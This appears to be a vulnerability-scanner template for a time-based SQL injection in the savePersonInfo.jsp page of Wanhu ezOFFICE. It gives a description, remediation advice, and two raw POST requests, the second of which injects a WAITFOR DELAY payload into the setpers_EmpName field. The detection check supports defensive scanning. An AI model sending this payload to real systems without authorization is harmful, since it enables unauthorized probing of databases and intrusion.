id: wanhuOA-sqli-savePersonInfo
info:
  name: Wanhu OA savePersonInfo Injection Vulnerability
  author:
  - 折跃
  description: |-
    Wanhu ezOFFICE savePersonInfo.jsp SQL injection vulnerability
    Wanhu ezOFFICE collaborative office platform is an OA collaborative office software product.

    Wanhu ezOFFICE contains an SQL injection vulnerability. Attackers can exploit it to execute SQL statements to view, add, modify, or delete information in the database.
  severity: high
  remediation: |-
    Official remedy:
    1. It is recommended that users obtain the latest patch or the latest version program from the official website:
    https://www.whir.net/

    Temporary remedy:
    1. Use prepared statements. When using PDO, be careful not to concatenate variables directly into PDO statements. All query statements should use the parameterized query interface provided by the database; parameterized statements use parameters instead of embedding user input variables into SQL statements. Currently almost all database systems provide a parameterized SQL statement execution interface, which can very effectively prevent SQL injection attacks.
    2. Escape or encode special characters entering the database (such as '"<>&*; etc.).
    3. Confirm the type of each data item; for example, numeric data must be numeric, and the corresponding database storage field must be of int type.
    4. Strictly limit data length, which can to some extent prevent longer SQL injection statements from executing correctly.
    5. Unify the encoding across every data layer of the website; it is recommended to use UTF-8 throughout, since inconsistent encoding between layers may allow some filtering models to be bypassed.
    6. Strictly restrict the database operation privileges of website users, giving each user only the minimum privileges needed for their work, thereby minimizing the harm of injection attacks to the database.
    7. Avoid displaying SQL error information on the website, such as type errors or field mismatches, to prevent attackers from using this error information for further judgment.
    8. Filter dangerous characters; for example, use regular expressions to match keywords such as union, sleep, and, select, and load_file, and terminate execution if a match is found.
requests:
- matchers:
  - type: dsl
    condition: and
    dsl:
    - (duration_2 - duration_1) >= 5
  raw:
  - |
    POST /defaultroot/mobile/setting/savePersonInfo.jsp HTTP/1.1
    Host: {{Hostname}}
    Content-Type: application/x-www-form-urlencoded

    setpers_EmpEnglishName=setpers_UserAccounts=TpDv&setpers_UserSimpleName=&setpers_EmpMobilePhone=TpIy&setpers_EmpbusPhone=&setpers_EmpEmail=JxIC&setpers_EmpPhone=&setpers_Empsex1=0&setpers_EmpDescribe=ffASsetpers_EmpName=exci
  - |
    POST /defaultroot/mobile/setting/savePersonInfo.jsp HTTP/1.1
    Host: {{Hostname}}
    Content-Type: application/x-www-form-urlencoded

    setpers_EmpEnglishName=setpers_UserAccounts=TpDv&setpers_UserSimpleName=&setpers_EmpMobilePhone=TpIy&setpers_EmpbusPhone=&setpers_EmpEmail=JxIC&setpers_EmpPhone=&setpers_Empsex1=0&setpers_EmpDescribe=ffASsetpers_EmpName=exci'%3BWAITFOR%20DELAY%20'0%3A0%3A5'--
  req-condition: true
